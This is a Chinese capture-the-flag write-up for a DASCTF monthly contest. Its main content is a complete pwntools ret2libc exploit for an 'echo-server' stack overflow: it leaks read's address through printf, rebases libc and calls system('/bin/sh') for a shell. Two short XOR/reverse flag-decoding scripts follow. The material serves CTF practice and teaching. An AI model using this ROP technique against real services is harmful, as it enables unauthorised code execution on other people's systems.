DASCTF安恒月赛-pwn

前言

开赛了,有点事情没打,晚上复现了一下。

echo-server

[*] '/ctf/work/ahys/echo server/test'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

程序很简单,经典栈溢出,rop利用即可。
但是因为是64位的,并且是glibc 2.27,发现在做的时候构造rop链总是会crash,
调试发现:

发现这段汇编直接会让程序crash,想起来ex师傅一篇文章分析过,64位程序rop到system拿shell的时候也会这样。但是很奇怪这个也出现了,索性尝试一波。
解决办法:还是加个ret,让栈对齐即可。

exp

from pwn import *
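local_file  = './test'
local_libc  = '/lib/x86_64-linux-gnu/libc-2.27.so'
remote_libc = './libc.so.6'
debug = 1

elf = ELF(local_file)
if debug:
    io = process(local_file)
    # Local run: use the libc the binary actually maps; only fall back to the
    # hard-coded path when pwntools cannot resolve one.  The original script
    # loaded local_libc here and then unconditionally replaced it with
    # elf.libc below, which also clobbered the remote libc chosen in the
    # else-branch, so the remote offsets would have been wrong.
    libc = elf.libc or ELF(local_libc)
else:
    # io = remote('node3.buuoj.cn',25390)
    # NOTE: io stays undefined in this branch until the remote() line is enabled.
    # Remote run: offsets must come from the libc shipped with the challenge.
    libc = ELF(remote_libc)

context.log_level = 'debug'
context.arch = elf.arch
context.terminal = ['tmux','splitw','-h']#,'neww'

# Thin helpers around the tube (Python 2 str in / str out).
s         = lambda data               :io.send(data)
sa        = lambda delim,data         :io.sendafter(delim, data)
sl        = lambda data               :io.sendline(data)
sla       = lambda delim,data         :io.sendlineafter(delim, data)
sea       = lambda delim,data         :io.sendafter(delim, data)   # alias of sa, kept for compatibility
r         = lambda numb=4096          :io.recv(numb)
ru        = lambda delims, drop=True  :io.recvuntil(delims, drop)
# Unpack a partial little-endian value by NUL-padding it to 4/8 bytes first.
uu32      = lambda data               :u32(data.ljust(4, '\0'))
uu64      = lambda data               :u64(data.ljust(8, '\0'))
info_addr = lambda tag, addr          :io.info(tag + ': {:#x}'.format(addr))
itr       = lambda                    :io.interactive()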
def dbg():
    """Attach gdb to the live target tube and pause until the user resumes."""
    # Alternative attach by pid with a startup script:
    # gdb.attach(proc.pidof(io)[0],gdbscript="b main")
    target = io
    gdb.attach(target)
    pause()
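pop_rdi = 0x0000000000400823# : pop rdi ; ret
offset = 136            # padding bytes written before the chain
start = 0x4005C0        # address the chain returns to so the program runs again (author's `start`; presumably the entry point — confirm)
ret = 0x0400768         # lone `ret` gadget; realigns the stack before the call (see the note above)

# Stage 1: call printf(read@got) to print the resolved address of read(),
# then jump back to `start` so the overflow can be triggered a second time.
sla('how long is your name:','500')
payload = '\x00' * offset + flat([ret,pop_rdi,elf.got['read'],elf.plt['printf'],start])
# dbg()
sla('s you name?',payload)
ru('hello ')
# Named read_addr rather than `read`: pwn's star-import already exports a
# `read` helper, which the original assignment shadowed.
read_addr = uu64(r(6))
info_addr('read',read_addr)          # the leak is read()'s address, not printf's
libc_base = read_addr - libc.symbols['read']
info_addr('libc_base',libc_base)

# Stage 2: system("/bin/sh") with addresses rebased on the leaked libc.
binsh = libc_base  + next(libc.search("/bin/sh"))   # next() works on both Python 2 and 3
system = libc_base + libc.sym['system']
sla('how long is your name:','500')  # same prompt as stage 1 (was written with a trailing space)
payload = '\x00' * offset + flat([ret,pop_rdi,binsh,system])
# rec = 0x4f322 + libc_base
# dbg()
sla('s you name?',payload)
itr()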

入门reverse

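s = 'akhb~chdaZrdaZudqduvdZvvv|'


def _decode(enc, key=6):
    """Invert the challenge's per-character transform.

    Each output character is ``(ord(c) - 1) ^ key``, i.e. the inverse of
    ``(c ^ key) + 1``.  Works on any length instead of a hard-coded 26.
    """
    return ''.join(chr((ord(c) - 1) ^ key) for c in enc)


flag = _decode(s)
print(flag)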

Encrypts

直接爆破了。

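s = [38,44,33,39,59,35,34,115,117,114,113,33,36,117,118,119,35,120,38,114,117,113,38,34,113,114,117,114,36,112,115,118,121,112,35,37,121,61]


def _xor_decode(data, key):
    """Return *data* (a list of byte values) XORed byte-wise with *key* as a str."""
    return ''.join(chr(b ^ key) for b in data)


# Try every single-byte key; the 0..127 range keeps the output in ASCII.
# The key is pinned by the first byte alone (s[0] ^ key must be 'f'), so at
# most one candidate survives the 'flag' prefix check.
candidates = [decoded
              for decoded in (_xor_decode(s, key) for key in range(128))
              if decoded.startswith('flag')]
for flag in candidates:
    print(flag)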


